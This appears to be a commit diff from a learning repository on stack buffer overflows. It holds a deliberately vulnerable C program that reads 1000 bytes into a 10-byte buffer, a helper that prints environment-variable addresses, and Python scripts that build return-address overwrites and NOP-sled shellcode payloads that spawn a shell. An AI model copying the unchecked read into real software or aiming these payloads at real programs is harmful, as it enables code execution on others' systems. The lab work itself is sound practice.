File tree 7 files changed +107
-0
lines changed
7 files changed +107
-0
lines changed Original file line number Diff line number Diff line change 1+ buf = ""
2+ buf += "A" * 1000
3+ file = open ('payload' , "w" )
4+ file .write (buf );
Original file line number Diff line number Diff line change 1+ from struct import *
2+
3+ buf = b""
4+ buf += b"A" * 22
5+ buf += pack ("<Q" , 0x00005555555551e7 )
6+ buf += b"A" * 70
7+
8+ file = open ("payload2" , "wb" )
9+ file .write (buf )
Original file line number Diff line number Diff line change 1+ #!/usr/bin/env python
2+
3+ from struct import *
4+ from pwn import *
5+
6+ context .arch = "amd64"
7+ context .os = "linux"
8+ shellcode = asm (shellcraft .sh ())
9+
10+ addr = struct .pack ("<Q" , 0x7fffffffdce0 )
11+ buf = b''
12+ buf += b'\x90 ' * 22
13+ buf += addr
14+ buf += b'\x90 ' * 8
15+ buf += shellcode
16+
17+ file = open ("payload3" , "wb" )
18+ file .write (buf )
19+
Original file line number Diff line number Diff line change 1+ #!/usr/bin/env python
2+
3+ from struct import *
4+ from pwn import *
5+
6+ context .arch = "amd64"
7+ context .os = "linux"
8+ shellcode = asm (shellcraft .sh ())
9+
10+ addr = struct .pack ("<Q" , 0x7fffffffdde0 )
11+ buf = b''
12+ buf += b'\x90 ' * 22
13+ buf += addr
14+ buf += b'\x90 ' * 200
15+ buf += shellcode
16+
17+ file = open ("payload4" , "wb" )
18+ file .write (buf )
19+
Original file line number Diff line number Diff line change 1+ #!/usr/bin/env python
2+
3+ from struct import *
4+ from pwn import *
5+
6+ # context.arch = "amd64"
7+ # context.os = "linux"
8+ # shellcode = asm(shellcraft.sh())
9+
10+ addr = struct .pack ("<Q" , 0x7fffffffecab )
11+ buf = b''
12+ buf += b'\x90 ' * 22
13+ buf += addr
14+ buf += b'\x90 ' * 200
15+ # buf += shellcode
16+
17+ file = open ("payload5" , "wb" )
18+ file .write (buf )
19+
Original file line number Diff line number Diff line change 1+ #include <stdio.h>
2+ #include <stdlib.h>
3+ #include <string.h>
4+
5+ //getting environmental variable address
6+
7+ int main (int argc , char * argv []) {
8+ if (argc != 2 ) {
9+ printf ("Must give the env variable name\n" );
10+ exit (0 );
11+ }
12+ char * ptr = getenv (argv [1 ]); // get env var address on stack
13+ printf ("Addr of %s is: %p\n" , argv [1 ], ptr );
14+ }
Original file line number Diff line number Diff line change 1+ #include <stdio.h>
2+ #include <unistd.h>
3+ #include <stdlib.h>
4+
5+ int getinput ()
6+ {
7+ char buf [10 ];
8+ int rv = read (0 , buf , 1000 );
9+ printf ("NUmber of bytes read are %d\n" , rv );
10+ return 0 ;
11+ }
12+
13+ int main ()
14+ {
15+ getinput ();
16+ return 0 ;
17+ }
18+
19+ int virus ()
20+ {
21+ printf ("Hacking Earth" );
22+ exit (0 );
23+ }
You can’t perform that action at this time.
0 commit comments